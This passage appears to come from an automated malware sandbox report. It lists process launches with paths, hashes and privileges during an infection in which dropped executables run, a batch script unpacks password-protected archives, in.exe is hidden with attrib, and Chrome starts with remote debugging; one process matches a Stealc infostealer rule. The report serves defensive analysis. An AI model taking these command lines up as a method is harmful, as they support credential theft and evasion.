                                                                                                                                                                                                                                                              Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff70ef80000
                                                                                                                                                                                                                                                              File size:251'392 bytes
                                                                                                                                                                                                                                                              MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:21
                                                                                                                                                                                                                                                              Start time:20:17:08
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff70ef80000
                                                                                                                                                                                                                                                              File size:251'392 bytes
                                                                                                                                                                                                                                                              MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:22
                                                                                                                                                                                                                                                              Start time:20:17:09
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019806001\b05c9e01f3.exe"
                                                                                                                                                                                                                                                              Imagebase:0x8a0000
                                                                                                                                                                                                                                                              File size:4'433'408 bytes
                                                                                                                                                                                                                                                              MD5 hash:17830E6496A4FA2D4DC73BA36CE61725
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:23
                                                                                                                                                                                                                                                              Start time:20:17:16
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Windows Media Player\graph\graph.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Windows Media Player\graph\graph.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff70ef80000
                                                                                                                                                                                                                                                              File size:251'392 bytes
                                                                                                                                                                                                                                                              MD5 hash:7D254439AF7B1CAAA765420BEA7FBD3F
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:24
                                                                                                                                                                                                                                                              Start time:20:17:22
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019807001\fed209a298.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:4'438'776 bytes
                                                                                                                                                                                                                                                              MD5 hash:3A425626CBD40345F5B8DDDD6B2B9EFA
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 87%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:25
                                                                                                                                                                                                                                                              Start time:20:17:27
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S"
                                                                                                                                                                                                                                                              Imagebase:0x7ff743ce0000
                                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:26
                                                                                                                                                                                                                                                              Start time:20:17:28
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                              Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                              File size:862'208 bytes
                                                                                                                                                                                                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:27
                                                                                                                                                                                                                                                              Start time:20:17:28
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\mode.com
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:mode 65,10
                                                                                                                                                                                                                                                              Imagebase:0x7ff67b590000
                                                                                                                                                                                                                                                              File size:33'280 bytes
                                                                                                                                                                                                                                                              MD5 hash:BEA7464830980BF7C0490307DB4FC875
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:28
                                                                                                                                                                                                                                                              Start time:20:17:28
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:7z.exe e file.zip -p24291711423417250691697322505 -oextracted
                                                                                                                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                                              • Detection: 0%, ReversingLabs
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:29
                                                                                                                                                                                                                                                              Start time:20:17:29
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_7.zip -oextracted
                                                                                                                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:30
                                                                                                                                                                                                                                                              Start time:20:17:29
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_6.zip -oextracted
                                                                                                                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:31
                                                                                                                                                                                                                                                              Start time:20:17:30
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019808001\c9d0f96e57.exe"
                                                                                                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                                                                                                              File size:1'959'936 bytes
                                                                                                                                                                                                                                                              MD5 hash:63941836D5C054B13AE7B96F743C38CB
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:32
                                                                                                                                                                                                                                                              Start time:20:17:31
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_5.zip -oextracted
                                                                                                                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:33
                                                                                                                                                                                                                                                              Start time:20:17:32
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_4.zip -oextracted
                                                                                                                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:34
                                                                                                                                                                                                                                                              Start time:20:17:37
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_3.zip -oextracted
                                                                                                                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:35
                                                                                                                                                                                                                                                              Start time:20:17:39
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe"
                                                                                                                                                                                                                                                              Imagebase:0xec0000
                                                                                                                                                                                                                                                              File size:1'845'760 bytes
                                                                                                                                                                                                                                                              MD5 hash:F417402BF33D99A0AF654DFBF7042087
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:36
                                                                                                                                                                                                                                                              Start time:20:17:41
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:37
                                                                                                                                                                                                                                                              Start time:20:17:44
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:38
                                                                                                                                                                                                                                                              Start time:20:17:44
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:40
                                                                                                                                                                                                                                                              Start time:20:17:45
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1896,i,12670110117547472489,9919710974034133825,262144 /prefetch:8
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:41
                                                                                                                                                                                                                                                              Start time:20:17:45
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=2004,i,2036866093412023983,10134248747286953754,262144 /prefetch:8
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:42
                                                                                                                                                                                                                                                              Start time:20:17:49
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_2.zip -oextracted
                                                                                                                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:43
                                                                                                                                                                                                                                                              Start time:20:17:50
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019810001\35f0a75b93.exe"
                                                                                                                                                                                                                                                              Imagebase:0x360000
                                                                                                                                                                                                                                                              File size:2'955'776 bytes
                                                                                                                                                                                                                                                              MD5 hash:F853C23F7A2641FEB4E4B94F59728314
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                                              • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000002B.00000003.3493806478.0000000005110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:44
                                                                                                                                                                                                                                                              Start time:20:17:57
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019809001\142c991362.exe"
                                                                                                                                                                                                                                                              Imagebase:0xec0000
                                                                                                                                                                                                                                                              File size:1'845'760 bytes
                                                                                                                                                                                                                                                              MD5 hash:F417402BF33D99A0AF654DFBF7042087
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                                              Target ID:45
                                                                                                                                                                                                                                                              Start time:20:17:58
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\1019811001\2e4e1b8516.exe"
                                                                                                                                                                                                                                                              Imagebase:0x5e0000
                                                                                                                                                                                                                                                              File size:965'120 bytes
                                                                                                                                                                                                                                                              MD5 hash:58F6FD6BFBBB99454234A6099D39E954
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:46
                                                                                                                                                                                                                                                              Start time:20:18:04
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:47
                                                                                                                                                                                                                                                              Start time:20:18:04
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:48
                                                                                                                                                                                                                                                              Start time:20:18:05
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2484 --field-trial-handle=2328,i,6628927633879078987,5168946575575726865,262144 /prefetch:8
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:49
                                                                                                                                                                                                                                                              Start time:20:18:05
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2020,i,9689288529753768681,16251776256977340336,262144 /prefetch:8
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:50
                                                                                                                                                                                                                                                              Start time:20:18:06
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:7z.exe e extracted/file_1.zip -oextracted
                                                                                                                                                                                                                                                              Imagebase:0x100000
                                                                                                                                                                                                                                                              File size:468'992 bytes
                                                                                                                                                                                                                                                              MD5 hash:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:51
                                                                                                                                                                                                                                                              Start time:20:18:07
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --load-extension=""
                                                                                                                                                                                                                                                              Imagebase:0x7ff76e190000
                                                                                                                                                                                                                                                              File size:3'242'272 bytes
                                                                                                                                                                                                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:52
                                                                                                                                                                                                                                                              Start time:20:18:08
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Windows\System32\attrib.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:attrib +H "in.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff6727b0000
                                                                                                                                                                                                                                                              File size:23'040 bytes
                                                                                                                                                                                                                                                              MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Target ID:53
                                                                                                                                                                                                                                                              Start time:20:18:08
                                                                                                                                                                                                                                                              Start date:21/12/2024
                                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\main\in.exe
                                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                                              Commandline:"in.exe"
                                                                                                                                                                                                                                                              Imagebase:0x7ff7aac30000
                                                                                                                                                                                                                                                              File size:1'827'328 bytes
                                                                                                                                                                                                                                                              MD5 hash:83D75087C9BF6E4F07C36E550731CCDE
                                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                                              Reset < >

                                                                                                                                                                                                                                                                Execution Graph

                                                                                                                                                                                                                                                                Execution Coverage:2.8%
                                                                                                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                Signature Coverage:3.7%
                                                                                                                                                                                                                                                                Total number of Nodes:753
                                                                                                                                                                                                                                                                Total number of Limit Nodes:16
